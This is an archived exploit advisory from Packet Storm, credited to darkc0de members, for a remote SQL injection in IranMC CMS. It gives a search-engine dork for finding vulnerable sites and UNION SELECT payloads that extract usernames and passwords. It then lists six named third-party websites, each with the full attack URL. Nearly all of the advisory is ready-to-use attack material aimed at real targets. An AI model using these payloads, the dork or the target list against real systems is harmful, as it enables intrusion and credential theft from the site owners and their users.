exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

iranmc-sql.txt

iranmc-sql.txt
Posted Sep 6, 2008
Authored by baltazar, sinner_01 | Site darkc0de.com

IranMC CMS suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 56e10356bc27298efd0ac38b2a588bc3cd820ba9370b261370379df157e49ae3

iranmc-sql.txt

Change Mirror Download
 
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - beenu --- #
# --- QKrun1x - skillfaker - FeDeReR - Optyx - Nuclear ---#
################################################################
#
# Author: sinner_01 and baltazar
#
# Home : www.darkc0de.com & ljuska.org
#
# Email : sinn3r01@gmail.com, b4ltazar@gmail.com
#
# Share the c0de!
#
################################################################
#
# App Name: IranMC CMS
#
# App Home: http://iranmc.org/
#
# Dork: inurl:zcat.php?id=
#
# Vuln column number: 3,4
#
# Default columns name : user,pass
#
# POC: -1+union+all+select+1,2,concat(user,char(58),pass),4+from+user--
#
# P0C-2: -1+union+all+select+1,2,concat(user,char(58),pass),4,5+from+user--
#
# Examples:
#
# http://www.irnovin.com/zcat.php?id=-1+union+all+select+1,2,concat(user,char(58),pass),4,5+from+user--
# http://www.sharghishop.com/zcat.php?id=-1+union+all+select+1,2,concat(user,char(58),pass),4,5+from+user--
# http://www.filmkala.ir/zcat.php?id=-1+union+all+select+1,2,concat(user,char(58),pass),4+from+user--
# http://www.rasashop.com/zcat.php?id=-1+union+all+select+1,2,concat(user,char(58),pass),4,5+from+user--
# http://dvdkala.ir/zcat.php?id=-1+union+all+select+1,2,concat(user,char(58),pass),4,5+from+user--
# http://www.asemanbook.com/zcat.php?id=-1+union+all+select+1,2,3,concat(user,char(58),pass),5+from+user--
#
################################################################
# Vuln Discovered 06/09/2008
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close